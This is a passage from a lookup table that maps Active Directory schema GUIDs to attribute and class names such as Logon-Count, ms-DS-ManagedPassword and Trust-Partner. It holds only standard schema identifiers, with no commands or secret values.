"7bfdcb7e-4807-11d1-a9c3-0000f80367c1": "Categories",
"bf9679aa-0de6-11d0-a285-00aa003049e2": "Logon-Count",
"261337aa-f1c3-44b2-bbea-c88d49e6f0c7": "ms-DFSR-MemberReference",
"bf9679e4-0de6-11d0-a285-00aa003049e2": "Obj-Dist-Name",
"bf967a43-0de6-11d0-a285-00aa003049e2": "System-Auxiliary-Class",
"6cdc047f-f522-b74a-9a9c-d95ac8cdfda2": "ms-Kds-UseStartTime",
"e263192c-2a02-48df-9792-94f2328781a0": "msSFU-30-Net-Id",
"7d6c0e94-7e20-11d0-afd6-00c04fd930c9": "Category-Id",
"bf9679ab-0de6-11d0-a285-00aa003049e2": "Logon-Hours",
"6c7b5785-3d21-41bf-8a8a-627941544d5a": "ms-DFSR-ComputerReference",
"26d97369-6070-11d1-a9c6-0000f80367c1": "Object-Category",
"e0fa1e62-9b45-11d0-afdd-00c04fd930c9": "System-Flags",
"ae18119f-6390-0045-b32d-97dbc701aef7": "ms-Kds-CreateTime",
"5b06b06a-4cf3-44c0-bd16-43bc10a987da": "ms-DS-Password-Settings-Container",
"963d2732-48be-11d1-a9c3-0000f80367c1": "Certificate-Authority-Object",
"bf9679ac-0de6-11d0-a285-00aa003049e2": "Logon-Workstation",
"adde62c6-1880-41ed-bd3c-30b7d25e14f0": "ms-DFSR-MemberReferenceBL",
"bf9679e5-0de6-11d0-a285-00aa003049e2": "Object-Class",
"bf967a44-0de6-11d0-a285-00aa003049e2": "System-May-Contain",
"9cdfdbc5-0304-4569-95f6-c4f663fe5ae6": "ms-Imaging-Thumbprint-Hash",
"36297dce-656b-4423-ab65-dabb2770819e": "msSFU-30-Domain-Info",
"1677579f-47f3-11d1-a9c3-0000f80367c1": "Certificate-Revocation-List",
"bf9679ad-0de6-11d0-a285-00aa003049e2": "LSA-Creation-Time",
"5eb526d7-d71b-44ae-8cc6-95460052e6ac": "ms-DFSR-ComputerReferenceBL",
"bf9679e6-0de6-11d0-a285-00aa003049e2": "Object-Class-Category",
"bf967a45-0de6-11d0-a285-00aa003049e2": "System-Must-Contain",
"8ae70db5-6406-4196-92fe-f3bb557520a7": "ms-Imaging-Hash-Algorithm",
"da83fc4f-076f-4aea-b4dc-8f4dab9b5993": "ms-DS-Quota-Container",
"2a39c5b1-8960-11d1-aebc-0000f80367c1": "Certificate-Templates",
"bf9679ae-0de6-11d0-a285-00aa003049e2": "LSA-Modified-Count",
"eb20e7d6-32ad-42de-b141-16ad2631b01b": "ms-DFSR-Priority",
"9a7ad94b-ca53-11d1-bbd0-0080c76670c0": "Object-Classes",
"bf967a46-0de6-11d0-a285-00aa003049e2": "System-Only",
"3f78c3e5-f79a-46bd-a0b8-9d18116ddc79": "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity",
"e15334a3-0bf0-4427-b672-11f5d84acc92": "msSFU-30-Network-User",
"548e1c22-dea6-11d0-b010-0000f80367c1": "Class-Display-Name",
"bf9679af-0de6-11d0-a285-00aa003049e2": "Machine-Architecture",
"817cf0b8-db95-4914-b833-5a079ef65764": "ms-DFSR-DeletedPath",
"34aaa216-b699-11d0-afee-0000f80367c1": "Object-Count",
"bf967a47-0de6-11d0-a285-00aa003049e2": "System-Poss-Superiors",
"e362ed86-b728-0842-b27d-2dea7a9df218": "ms-DS-ManagedPassword",
"de91fc26-bd02-4b52-ae26-795999e96fc7": "ms-DS-Quota-Control",
"bf967938-0de6-11d0-a285-00aa003049e2": "Code-Page",
"c9b6358e-bb38-11d0-afef-0000f80367c1": "Machine-Password-Change-Interval",
"53ed9ad1-9975-41f4-83f5-0c061a12553a": "ms-DFSR-DeletedSizeInMb",
"bf9679e7-0de6-11d0-a285-00aa003049e2": "Object-Guid",
"bf967a49-0de6-11d0-a285-00aa003049e2": "Telephone-Number",
"0e78295a-c6d3-0a40-b491-d62251ffa0a6": "ms-DS-ManagedPasswordId",
"faf733d0-f8eb-4dcf-8d75-f1753af6a50b": "msSFU-30-NIS-Map-Config",
"bf96793b-0de6-11d0-a285-00aa003049e2": "COM-ClassID",
"bf9679b2-0de6-11d0-a285-00aa003049e2": "Machine-Role",
"5ac48021-e447-46e7-9d23-92c0c6a90dfb": "ms-DFSR-ReadOnly",
"bf9679e8-0de6-11d0-a285-00aa003049e2": "Object-Sid",
"bf967a4a-0de6-11d0-a285-00aa003049e2": "Teletex-Terminal-Identifier",
"d0d62131-2d4a-d04f-99d9-1c63646229a4": "ms-DS-ManagedPasswordPreviousId",
"ce206244-5827-4a86-ba1c-1c0c386c1b64": "ms-DS-Managed-Service-Account",
"281416d9-1968-11d0-a28f-00aa003049e2": "COM-CLSID",
"80a67e4f-9f22-11d0-afdd-00c04fd930c9": "Machine-Wide-Policy",
"db7a08e7-fc76-4569-a45f-f5ecb66a88b5": "ms-DFSR-CachePolicy",
"16775848-47f3-11d1-a9c3-0000f80367c1": "Object-Version",
"bf967a4b-0de6-11d0-a285-00aa003049e2": "Telex-Number",
"f8758ef7-ac76-8843-a2ee-a26b4dcaf409": "ms-DS-ManagedPasswordInterval",
"1cb81863-b822-4379-9ea2-5ff7bdc6386d": "ms-net-ieee-80211-GroupPolicy",
"bf96793c-0de6-11d0-a285-00aa003049e2": "COM-InterfaceID",
"0296c120-40da-11d1-a9c0-0000f80367c1": "Managed-By",
"4c5d607a-ce49-444a-9862-82a95f5d1fcc": "ms-DFSR-MinDurationCacheInMin",
"bf9679ea-0de6-11d0-a285-00aa003049e2": "OEM-Information",
"0296c121-40da-11d1-a9c0-0000f80367c1": "Telex-Primary",
"888eedd6-ce04-df40-b462-b8a50e41ba38": "ms-DS-GroupMSAMembership",
"281416dd-1968-11d0-a28f-00aa003049e2": "COM-Other-Prog-Id",
"0296c124-40da-11d1-a9c0-0000f80367c1": "Managed-Objects",
"2ab0e48d-ac4e-4afc-83e5-a34240db6198": "ms-DFSR-MaxAgeInCacheInMin",
"bf9679ec-0de6-11d0-a285-00aa003049e2": "OM-Object-Class",
"ed9de9a0-7041-11d2-9905-0000f87a57d4": "Template-Roots",
"55872b71-c4b2-3b48-ae51-4095f91ec600": "ms-DS-Transformation-Rules",
"99a03a6a-ab19-4446-9350-0cb878ed2d9b": "ms-net-ieee-8023-GroupPolicy",
"bf96793d-0de6-11d0-a285-00aa003049e2": "COM-ProgID",
"bf9679b5-0de6-11d0-a285-00aa003049e2": "Manager",
"43061ac1-c8ad-4ccc-b785-2bfac20fc60a": "ms-FVE-RecoveryPassword",
"bf9679ed-0de6-11d0-a285-00aa003049e2": "OM-Syntax",
"6db69a1c-9422-11d1-aebd-0000f80367c1": "Terminal-Server",
"86284c08-0c6e-1540-8b15-75147d23d20d": "ms-DS-Ingress-Claims-Transformation-Policy",
"fa85c591-197f-477e-83bd-ea5a43df2239": "ms-DFSR-LocalSettings",
"281416db-1968-11d0-a28f-00aa003049e2": "COM-Treat-As-Class-Id",
"bf9679b7-0de6-11d0-a285-00aa003049e2": "MAPI-ID",
"85e5a5cf-dcee-4075-9cfd-ac9db6a2f245": "ms-FVE-VolumeGuid",
"ddac0cf3-af8f-11d0-afeb-00c04fd930c9": "OMT-Guid",
"f0f8ffa7-1191-11d0-a060-00aa006c33ed": "Text-Country",
"c137427e-9a73-b040-9190-1b095bb43288": "ms-DS-Egress-Claims-Transformation-Policy",
"ea715d30-8f53-40d0-bd1e-6109186d782c": "ms-FVE-RecoveryInformation",
"281416de-1968-11d0-a28f-00aa003049e2": "COM-Typelib-Id",
"bf9679b9-0de6-11d0-a285-00aa003049e2": "Marshalled-Interface",
"1fd55ea8-88a7-47dc-8129-0daa97186a54": "ms-FVE-KeyPackage",
"1f0075fa-7e40-11d0-afd6-00c04fd930c9": "OMT-Indx-Guid",
"a8df7489-c5ea-11d1-bbcb-0080c76670c0": "Text-Encoded-OR-Address",
"d5006229-9913-2242-8b17-83761d1e0e5b": "ms-DS-TDO-Egress-BL",
"e11505d7-92c4-43e7-bf5c-295832ffc896": "ms-DFSR-Subscriber",
"281416da-1968-11d0-a28f-00aa003049e2": "COM-Unique-LIBID",
"e48e64e0-12c9-11d3-9102-00c04fd91ab1": "Mastered-By",
"f76909bc-e678-47a0-b0b3-f86a0044c06d": "ms-FVE-RecoveryGuid",
"3e978925-8c01-11d0-afda-00c04fd930c9": "Operating-System",
"ddac0cf1-af8f-11d0-afeb-00c04fd930c9": "Time-Refresh",
"5a5661a1-97c6-544b-8056-e430fe7bc554": "ms-DS-TDO-Ingress-BL",
"25173408-04ca-40e8-865e-3f9ce9bf1bd3": "ms-DFS-Deleted-Link-v2",
"bf96793e-0de6-11d0-a285-00aa003049e2": "Comment",
"bf9679bb-0de6-11d0-a285-00aa003049e2": "Max-Pwd-Age",
"aa4e1a6d-550d-4e05-8c35-4afcb917a9fe": "ms-TPM-OwnerInformation",
"bd951b3c-9c96-11d0-afdd-00c04fd930c9": "Operating-System-Hotfix",
"ddac0cf0-af8f-11d0-afeb-00c04fd930c9": "Time-Vol-Change",
"0bb49a10-536b-bc4d-a273-0bab0dd4bd10": "ms-DS-Transformation-Rules-Compiled",
"67212414-7bcc-4609-87e0-088dad8abdee": "ms-DFSR-Subscription",
"bf96793f-0de6-11d0-a285-00aa003049e2": "Common-Name",
"bf9679bc-0de6-11d0-a285-00aa003049e2": "Max-Renew-Age",
"0e0d0938-2658-4580-a9f6-7a0ac7b566cb": "ms-ieee-80211-Data",
"3e978927-8c01-11d0-afda-00c04fd930c9": "Operating-System-Service-Pack",
"bf967a55-0de6-11d0-a285-00aa003049e2": "Title",
"693f2006-5764-3d4a-8439-58f04aab4b59": "ms-DS-Applies-To-Resource-Types",
"7769fb7a-1159-4e96-9ccd-68bc487073eb": "ms-DFS-Link-v2",
"f0f8ff88-1191-11d0-a060-00aa006c33ed": "Company",
"bf9679bd-0de6-11d0-a285-00aa003049e2": "Max-Storage",
"6558b180-35da-4efe-beed-521f8f48cafb": "ms-ieee-80211-Data-Type",
"3e978926-8c01-11d0-afda-00c04fd930c9": "Operating-System-Version",
"16c3a860-1273-11d0-a060-00aa006c33ed": "Tombstone-Lifetime",
"24977c8c-c1b7-3340-b4f6-2b375eb711d7": "ms-DS-RID-Pool-Allocation-Enabled",
"7b35dbad-b3ec-486a-aad4-2fec9d6ea6f6": "ms-DFSR-GlobalSettings",
"bf967943-0de6-11d0-a285-00aa003049e2": "Content-Indexing-Allowed",
"bf9679be-0de6-11d0-a285-00aa003049e2": "Max-Ticket-Age",
"7f73ef75-14c9-4c23-81de-dd07a06f9e8b": "ms-ieee-80211-ID",
"bf9679ee-0de6-11d0-a285-00aa003049e2": "Operator-Count",
"c1dc867c-a261-11d1-b606-0000f80367c1": "Transport-Address-Attribute",
"9709eaaf-49da-4db2-908a-0446e5eab844": "ms-DS-cloudExtensionAttribute1",
"da73a085-6e64-4d61-b064-015d04164795": "ms-DFS-Namespace-Anchor",
"4d8601ee-ac85-11d0-afe3-00c04fd930c9": "Context-Menu",
"bf9679bf-0de6-11d0-a285-00aa003049e2": "May-Contain",
"8a5c99e9-2230-46eb-b8e8-e59d712eb9ee": "ms-IIS-FTP-Dir",
"963d274d-48be-11d1-a9c3-0000f80367c1": "Option-Description",
"26d97372-6070-11d1-a9c6-0000f80367c1": "Transport-DLL-Name",
"f34ee0ac-c0c1-4ba9-82c9-1a90752f16a5": "ms-DS-cloudExtensionAttribute2",
"1c332fe0-0c2a-4f32-afca-23c5e45a9e77": "ms-DFSR-ReplicationGroup",
"6da8a4fc-0e52-11d0-a286-00aa003049e2": "Control-Access-Rights",
"11b6cc8b-48c4-11d1-a9c3-0000f80367c1": "meetingAdvertiseScope",
"2a7827a4-1483-49a5-9d84-52e3812156b4": "ms-IIS-FTP-Root",
"19195a53-6da0-11d0-afd3-00c04fd930c9": "Options",
"26d97374-6070-11d1-a9c6-0000f80367c1": "Transport-Type",
"82f6c81a-fada-4a0d-b0f7-706d46838eb5": "ms-DS-cloudExtensionAttribute3",
"21cb8628-f3c3-4bbf-bff6-060b2d8f299a": "ms-DFS-Namespace-v2",
"bf967944-0de6-11d0-a285-00aa003049e2": "Cost",
"11b6cc83-48c4-11d1-a9c3-0000f80367c1": "meetingApplication",
"51583ce9-94fa-4b12-b990-304c35b18595": "ms-Imaging-PSP-Identifier",
"963d274e-48be-11d1-a9c3-0000f80367c1": "Options-Location",
"8fd044e3-771f-11d1-aeae-0000f80367c1": "Treat-As-Leaf",
"9cbf3437-4e6e-485b-b291-22b02554273f": "ms-DS-cloudExtensionAttribute4",
"64759b35-d3a1-42e4-b5f1-a3de162109b3": "ms-DFSR-Content",
"508ca374-a511-4e4e-9f4f-856f61a6b7e4": "Address-Book-Roots2",
"5fd42471-1262-11d0-a060-00aa006c33ed": "Country-Code",
"11b6cc92-48c4-11d1-a9c3-0000f80367c1": "meetingBandwidth",
"7b6760ae-d6ed-44a6-b6be-9de62c09ec67": "ms-Imaging-PSP-String",
"bf9679ef-0de6-11d0-a285-00aa003049e2": "Organization-Name",
"28630ebd-41d5-11d1-a9c1-0000f80367c1": "Tree-Name",
"2915e85b-e347-4852-aabb-22e5a651c864": "ms-DS-cloudExtensionAttribute5",
"4898f63d-4112-477c-8826-3ca00bd8277d": "Global-Address-List2",
"bf967945-0de6-11d0-a285-00aa003049e2": "Country-Name",
"11b6cc93-48c4-11d1-a9c3-0000f80367c1": "meetingBlob",
"35697062-1eaf-448b-ac1e-388e0be4fdee": "ms-net-ieee-80211-GP-PolicyGUID",
"bf9679f0-0de6-11d0-a285-00aa003049e2": "Organizational-Unit-Name",
"80a67e5a-9f22-11d0-afdd-00c04fd930c9": "Trust-Attributes",
"60452679-28e1-4bec-ace3-712833361456": "ms-DS-cloudExtensionAttribute6",
"4937f40d-a6dc-4d48-97ca-06e5fbfd3f16": "ms-DFSR-ContentSet",
"b1cba91a-0682-4362-a659-153e201ef069": "Template-Roots2",
"2b09958a-8931-11d1-aebc-0000f80367c1": "Create-Dialog",
"11b6cc87-48c4-11d1-a9c3-0000f80367c1": "meetingContactInfo",
"9c1495a5-4d76-468e-991e-1433b0a67855": "ms-net-ieee-80211-GP-PolicyData",
"28596019-7349-4d2f-adff-5a629961f942": "organizationalStatus",
"bf967a59-0de6-11d0-a285-00aa003049e2": "Trust-Auth-Incoming",
"4a7c1319-e34e-40c2-9d00-60ff7890f207": "ms-DS-cloudExtensionAttribute7",
"2df90d73-009f-11d2-aa4c-00c04fd7d83a": "Create-Time-Stamp",
"11b6cc7e-48c4-11d1-a9c3-0000f80367c1": "meetingDescription",
"0f69c62e-088e-4ff5-a53a-e923cec07c0a": "ms-net-ieee-80211-GP-PolicyReserved",
"5fd424ce-1262-11d0-a060-00aa006c33ed": "Original-Display-Table",
"bf967a5f-0de6-11d0-a285-00aa003049e2": "Trust-Auth-Outgoing",
"3cd1c514-8449-44ca-81c0-021781800d2a": "ms-DS-cloudExtensionAttribute8",
"04828aa9-6e42-4e80-b962-e2fe00754d17": "ms-DFSR-Topology",
"b8442f58-c490-4487-8a9d-d80b883271ad": "ms-DS-Claim-Type-Property-Base",
"2b09958b-8931-11d1-aebc-0000f80367c1": "Create-Wizard-Ext",
"11b6cc91-48c4-11d1-a9c3-0000f80367c1": "meetingEndTime",
"94a7b05a-b8b2-4f59-9c25-39e69baa1684": "ms-net-ieee-8023-GP-PolicyGUID",
"5fd424cf-1262-11d0-a060-00aa006c33ed": "Original-Display-Table-MSDOS",
"bf967a5c-0de6-11d0-a285-00aa003049e2": "Trust-Direction",
"0a63e12c-3040-4441-ae26-cd95af0d247e": "ms-DS-cloudExtensionAttribute9",
"bf967946-0de6-11d0-a285-00aa003049e2": "Creation-Time",
"11b6cc7c-48c4-11d1-a9c3-0000f80367c1": "meetingID",
"8398948b-7457-4d91-bd4d-8d7ed669c9f7": "ms-net-ieee-8023-GP-PolicyData",
"bf9679f1-0de6-11d0-a285-00aa003049e2": "Other-Login-Workstations",
"b000ea7a-a086-11d0-afdd-00c04fd930c9": "Trust-Parent",
"670afcb3-13bd-47fc-90b3-0a527ed81ab7": "ms-DS-cloudExtensionAttribute10",
"4229c897-c211-437c-a5ae-dbf705b696e5": "ms-DFSR-Member",
"36093235-c715-4821-ab6a-b56fb2805a58": "ms-DS-Claim-Types",
"4d8601ed-ac85-11d0-afe3-00c04fd930c9": "Creation-Wizard",
"11b6cc89-48c4-11d1-a9c3-0000f80367c1": "meetingIP",
"d3c527c7-2606-4deb-8cfd-18426feec8ce": "ms-net-ieee-8023-GP-PolicyReserved",
"0296c123-40da-11d1-a9c0-0000f80367c1": "Other-Mailbox",
"bf967a5d-0de6-11d0-a285-00aa003049e2": "Trust-Partner",
"9e9ebbc8-7da5-42a6-8925-244e12a56e24": "ms-DS-cloudExtensionAttribute11",
"7bfdcb85-4807-11d1-a9c3-0000f80367c1": "Creator",
"11b6cc8e-48c4-11d1-a9c3-0000f80367c1": "meetingIsEncrypted",
"3164c36a-ba26-468c-8bda-c1e5cc256728": "ms-PKI-Cert-Template-OID",
"bf9679f2-0de6-11d0-a285-00aa003049e2": "Other-Name",
"bf967a5e-0de6-11d0-a285-00aa003049e2": "Trust-Posix-Offset",
"3c01c43d-e10b-4fca-92b2-4cf615d5b09a": "ms-DS-cloudExtensionAttribute12",
"e58f972e-64b5-46ef-8d8b-bbc3e1897eab": "ms-DFSR-Connection",
"7a4a4584-b350-478f-acd6-b4b852d82cc0": "ms-DS-Resource-Properties",
"963d2737-48be-11d1-a9c3-0000f80367c1": "CRL-Object",
"11b6cc7f-48c4-11d1-a9c3-0000f80367c1": "meetingKeyword",
"dbd90548-aa37-4202-9966-8c537ba5ce32": "ms-PKI-Certificate-Application-Policy",
"1ea64e5d-ac0f-11d2-90df-00c04fd91ab1": "Other-Well-Known-Objects",
"bf967a60-0de6-11d0-a285-00aa003049e2": "Trust-Type",
"28be464b-ab90-4b79-a6b0-df437431d036": "ms-DS-cloudExtensionAttribute13",
"963d2731-48be-11d1-a9c3-0000f80367c1": "CRL-Partitioned-Revocation-List",
"11b6cc84-48c4-11d1-a9c3-0000f80367c1": "meetingLanguage",
"ea1dddc4-60ff-416e-8cc0-17cee534bce7": "ms-PKI-Certificate-Name-Flag",
"bf9679f3-0de6-11d0-a285-00aa003049e2": "Owner",
"bf967a61-0de6-11d0-a285-00aa003049e2": "UAS-Compat",
"cebcb6ba-6e80-4927-8560-98feca086a9f": "ms-DS-cloudExtensionAttribute14",
"7b9a2d92-b7eb-4382-9772-c3e0f9baaf94": "ms-ieee-80211-Policy",
"81a3857c-5469-4d8f-aae6-c27699762604": "ms-DS-Claim-Type",
"167757b2-47f3-11d1-a9c3-0000f80367c1": "Cross-Certificate-Pair",
"11b6cc80-48c4-11d1-a9c3-0000f80367c1": "meetingLocation",
"38942346-cc5b-424b-a7d8-6ffd12029c5f": "ms-PKI-Certificate-Policy",
"7d6c0e99-7e20-11d0-afd6-00c04fd930c9": "Package-Flags",
"0bb0fca0-1e89-429f-901a-1413894d9f59": "uid",
"aae4d537-8af0-4daa-9cc6-62eadb84ff03": "ms-DS-cloudExtensionAttribute15",
"1f0075fe-7e40-11d0-afd6-00c04fd930c9": "Curr-Machine-Id",
"11b6cc85-48c4-11d1-a9c3-0000f80367c1": "meetingMaxParticipants",
"b7ff5a38-0818-42b0-8110-d3d154c97f24": "ms-PKI-Credential-Roaming-Tokens",
"7d6c0e98-7e20-11d0-afd6-00c04fd930c9": "Package-Name",
"bf967a64-0de6-11d0-a285-00aa003049e2": "UNC-Name",
"9581215b-5196-4053-a11e-6ffcafc62c4d": "ms-DS-cloudExtensionAttribute16",
"a0ed2ac1-970c-4777-848e-ec63a0ec44fc": "ms-Imaging-PSPs",
"5b283d5e-8404-4195-9339-8450188c501a": "ms-DS-Resource-Property",
"1f0075fc-7e40-11d0-afd6-00c04fd930c9": "Current-Location",
"11b6cc7d-48c4-11d1-a9c3-0000f80367c1": "meetingName",
"d15ef7d8-f226-46db-ae79-b34e560bd12c": "ms-PKI-Enrollment-Flag",
"7d6c0e96-7e20-11d0-afd6-00c04fd930c9": "Package-Type",
"bf9679e1-0de6-11d0-a285-00aa003049e2": "Unicode-Pwd",
"3d3c6dda-6be8-4229-967e-2ff5bb93b4ce": "ms-DS-cloudExtensionAttribute17",
"963d273f-48be-11d1-a9c3-0000f80367c1": "Current-Parent-CA",
"11b6cc86-48c4-11d1-a9c3-0000f80367c1": "meetingOriginator",
"f22bd38f-a1d0-4832-8b28-0331438886a6": "ms-PKI-Enrollment-Servers",
"5245801b-ca6a-11d0-afff-0000f80367c1": "Parent-CA",
"ba0184c7-38c5-4bed-a526-75421470580c": "uniqueIdentifier",
"88e73b34-0aa6-4469-9842-6eb01b32a5b5": "ms-DS-cloudExtensionAttribute18",
"1f7c257c-b8a3-4525-82f8-11ccc7bee36e": "ms-Imaging-PostScanProcess",
"72e3d47a-b342-4d45-8f56-baff803cabf9": "ms-DS-Resource-Property-List",
"bf967947-0de6-11d0-a285-00aa003049e2": "Current-Value",
"11b6cc88-48c4-11d1-a9c3-0000f80367c1": "meetingOwner",
"e96a63f5-417f-46d3-be52-db7703c503df": "ms-PKI-Minimal-Key-Size",
"963d2733-48be-11d1-a9c3-0000f80367c1": "Parent-CA-Certificate-Chain",
"8f888726-f80a-44d7-b1ee-cb9df21392c8": "uniqueMember",
"0975fe99-9607-468a-8e18-c800d3387395": "ms-DS-cloudExtensionAttribute19",
"bf96799c-0de6-11d0-a285-00aa003049e2": "DBCS-Pwd",
"11b6cc81-48c4-11d1-a9c3-0000f80367c1": "meetingProtocol",
"8c9e1288-5028-4f4f-a704-76d026f246ef": "ms-PKI-OID-Attribute",
"2df90d74-009f-11d2-aa4c-00c04fd7d83a": "Parent-GUID",
"50950839-cc4c-4491-863a-fcf942d684b7": "unstructuredAddress",
"f5446328-8b6e-498d-95a8-211748d5acdc": "ms-DS-cloudExtensionAttribute20",
"a16f33c7-7fd6-4828-9364-435138fda08d": "ms-Print-ConnectionPolicy",
"b72f862b-bb25-4d5d-aa51-62c59bdf90ae": "ms-SPP-Activation-Objects-Container",
"bf967948-0de6-11d0-a285-00aa003049e2": "Default-Class-Store",
"11b6cc8d-48c4-11d1-a9c3-0000f80367c1": "meetingRating",
"5f49940e-a79f-4a51-bb6f-3d446a54dc6b": "ms-PKI-OID-CPS",
"28630ec0-41d5-11d1-a9c1-0000f80367c1": "Partial-Attribute-Deletion-List",
"9c8ef177-41cf-45c9-9673-7716c0c8901b": "unstructuredName",
"6b3d6fda-0893-43c4-89fb-1fb52a6616a9": "ms-DS-Issuer-Certificates",
"720bc4e2-a54a-11d0-afdf-00c04fd930c9": "Default-Group",
"11b6cc8f-48c4-11d1-a9c3-0000f80367c1": "meetingRecurrence",
"7d59a816-bb05-4a72-971f-5c1331f67559": "ms-PKI-OID-LocalizedName",
"19405b9e-3cfa-11d1-a9c0-0000f80367c1": "Partial-Attribute-Set",
"d9e18312-8939-11d1-aebc-0000f80367c1": "Upgrade-Product-Code",
"ca3286c2-1f64-4079-96bc-e62b610e730f": "ms-DS-Registration-Quota",
"37cfd85c-6719-4ad8-8f9e-8678ba627563": "ms-PKI-Enterprise-Oid",
"51a0e68c-0dc5-43ca-935d-c1c911bf2ee5": "ms-SPP-Activation-Object",
"b7b13116-b82e-11d0-afee-0000f80367c1": "Default-Hiding-Value",
"11b6cc8a-48c4-11d1-a9c3-0000f80367c1": "meetingScope",
"04c4da7a-e114-4e69-88de-e293f2d3b395": "ms-PKI-OID-User-Notice",
"07383084-91df-11d1-aebc-0000f80367c1": "Pek-Key-Change-Interval",
"032160bf-9824-11d1-aec0-0000f80367c1": "UPN-Suffixes",
"0a5caa39-05e6-49ca-b808-025b936610e7": "ms-DS-Maximum-Registration-Inactivity-Period",
"bf96799f-0de6-11d0-a285-00aa003049e2": "Default-Local-Policy-Object",
"11b6cc90-48c4-11d1-a9c3-0000f80367c1": "meetingStartTime",
"bab04ac2-0435-4709-9307-28380e7c7001": "ms-PKI-Private-Key-Flag",
"07383083-91df-11d1-aebc-0000f80367c1": "Pek-List",
"bf967a68-0de6-11d0-a285-00aa003049e2": "User-Account-Control",
"e3fb56c8-5de8-45f5-b1b1-d2b6cd31e762": "ms-DS-Device-Location",
"26ccf238-a08e-4b86-9a82-a8c9ac7ee5cb": "ms-PKI-Key-Recovery-Agent",
"e027a8bd-6456-45de-90a3-38593877ee74": "ms-TPM-Information-Objects-Container",
"26d97367-6070-11d1-a9c6-0000f80367c1": "Default-Object-Category",
"11b6cc82-48c4-11d1-a9c3-0000f80367c1": "meetingType",
"0cd8711f-0afc-4926-a4b1-09b08d3d436c": "ms-PKI-Site-Name",
"963d273c-48be-11d1-a9c3-0000f80367c1": "Pending-CA-Certificates",
"bf967a69-0de6-11d0-a285-00aa003049e2": "User-Cert",
"617626e9-01eb-42cf-991f-ce617982237e": "ms-DS-Registered-Owner",
"281416c8-1968-11d0-a28f-00aa003049e2": "Default-Priority",
"11b6cc8c-48c4-11d1-a9c3-0000f80367c1": "meetingURL",
"9de8ae7d-7a5b-421d-b5e4-061f79dfd5d7": "ms-PKI-Supersede-Templates",
"963d273e-48be-11d1-a9c3-0000f80367c1": "Pending-Parent-CA",
"bf967a6a-0de6-11d0-a285-00aa003049e2": "User-Comment",
"0449160c-5a8e-4fc8-b052-01c0f6e48f02": "ms-DS-Registered-Users",
"05f6c878-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLServer",
"85045b6a-47a6-4243-a7cc-6890701f662c": "ms-TPM-Information-Object",
"807a6d30-1669-11d0-a064-00aa006c33ed": "Default-Security-Descriptor",
"bf9679c0-0de6-11d0-a285-00aa003049e2": "Member",
"13f5236c-1884-46b1-b5d0-484e38990d58": "ms-PKI-Template-Minor-Revision",
"5fd424d3-1262-11d0-a060-00aa006c33ed": "Per-Msg-Dialog-Display-Table",
"bf967a6d-0de6-11d0-a285-00aa003049e2": "User-Parameters",
"a34f983b-84c6-4f0c-9050-a3a14a1d35a4": "ms-DS-Approximate-Last-Logon-Time-Stamp",
"167757b5-47f3-11d1-a9c3-0000f80367c1": "Delta-Revocation-List",
"0296c122-40da-11d1-a9c0-0000f80367c1": "MHS-OR-Address",
"0c15e9f5-491d-4594-918f-32813a091da9": "ms-PKI-Template-Schema-Version",
"5fd424d4-1262-11d0-a060-00aa006c33ed": "Per-Recip-Dialog-Display-Table",
"bf967a6e-0de6-11d0-a285-00aa003049e2": "User-Password",
"22a95c0e-1f83-4c82-94ce-bea688cfc871": "ms-DS-Is-Enabled",
"0c7e18ea-ccef-11d2-9993-0000f87a57d4": "MS-SQL-OLAPServer",
"ef2fc3ed-6e18-415b-99e4-3114a8cb124b": "ms-DNS-Server-Settings",
"bf96794f-0de6-11d0-a285-00aa003049e2": "Department",
"bf9679c2-0de6-11d0-a285-00aa003049e2": "Min-Pwd-Age",
"3c91fbbf-4773-4ccd-a87b-85d53e7bcf6a": "ms-PKI-RA-Application-Policies",
"16775858-47f3-11d1-a9c3-0000f80367c1": "Personal-Title",
"11732a8a-e14d-4cc5-b92f-d93f51c6d8e4": "userClass",
"100e454d-f3bb-4dcb-845f-8d5edc471c59": "ms-DS-Device-OS-Type",
"be9ef6ee-cbc7-4f22-b27b-96967e7ee585": "departmentNumber",
"bf9679c3-0de6-11d0-a285-00aa003049e2": "Min-Pwd-Length",
"d546ae22-0951-4d47-817e-1c9f96faad46": "ms-PKI-RA-Policies",
"0296c11d-40da-11d1-a9c0-0000f80367c1": "Phone-Fax-Other",
"23998ab5-70f8-4007-a4c1-a84a38311f9a": "userPKCS12",
"70fb8c63-5fab-4504-ab9d-14b329a8a7f8": "ms-DS-Device-OS-Version",
"11d43c5c-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLRepository",
"555c21c3-a136-455a-9397-796bbd358e25": "ms-Authz-Central-Access-Policies",
"bf967950-0de6-11d0-a285-00aa003049e2": "Description",
"bf9679c4-0de6-11d0-a285-00aa003049e2": "Min-Ticket-Age",
"fe17e04b-937d-4f7e-8e0e-9292c8d5683e": "ms-PKI-RA-Signature",
"f0f8ffa2-1191-11d0-a060-00aa006c33ed": "Phone-Home-Other",
"28630ebb-41d5-11d1-a9c1-0000f80367c1": "User-Principal-Name",
"90615414-a2a0-4447-a993-53409599b74e": "ms-DS-Device-Physical-IDs",
"eea65906-8ac6-11d0-afda-00c04fd930c9": "Desktop-Profile",
"bf9679c5-0de6-11d0-a285-00aa003049e2": "Modified-Count",
"6617e4ac-a2f1-43ab-b60c-11fbd1facf05": "ms-PKI-RoamingTimeStamp",
"f0f8ffa1-1191-11d0-a060-00aa006c33ed": "Phone-Home-Primary",
"9a9a021f-4a5b-11d1-a9c3-0000f80367c1": "User-Shared-Folder",
"c30181c7-6342-41fb-b279-f7c566cbe0a7": "ms-DS-Device-ID",
"17c2f64e-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLPublication",
"99bb1b7a-606d-4f8b-800e-e15be554ca8d": "ms-Authz-Central-Access-Rules",
"974c9a02-33fc-11d3-aa6e-00c04f8eedd8": "msExch-Proxy-Gen-Options",
"bf967951-0de6-11d0-a285-00aa003049e2": "Destination-Indicator",
"bf9679c6-0de6-11d0-a285-00aa003049e2": "Modified-Count-At-Last-Prom",
"b3f93023-9239-4f7c-b99c-6745d87adbc2": "ms-PKI-DPAPIMasterKeys",
"4d146e4b-48d4-11d1-a9c3-0000f80367c1": "Phone-Ip-Other",
"9a9a0220-4a5b-11d1-a9c3-0000f80367c1": "User-Shared-Folder-Other",
"ef65695a-f179-4e6a-93de-b01e06681cfb": "ms-DS-Device-Object-Version",
"963d2750-48be-11d1-a9c3-0000f80367c1": "dhcp-Classes",
"9a7ad94a-ca53-11d1-bbd0-0080c76670c0": "Modify-Time-Stamp",
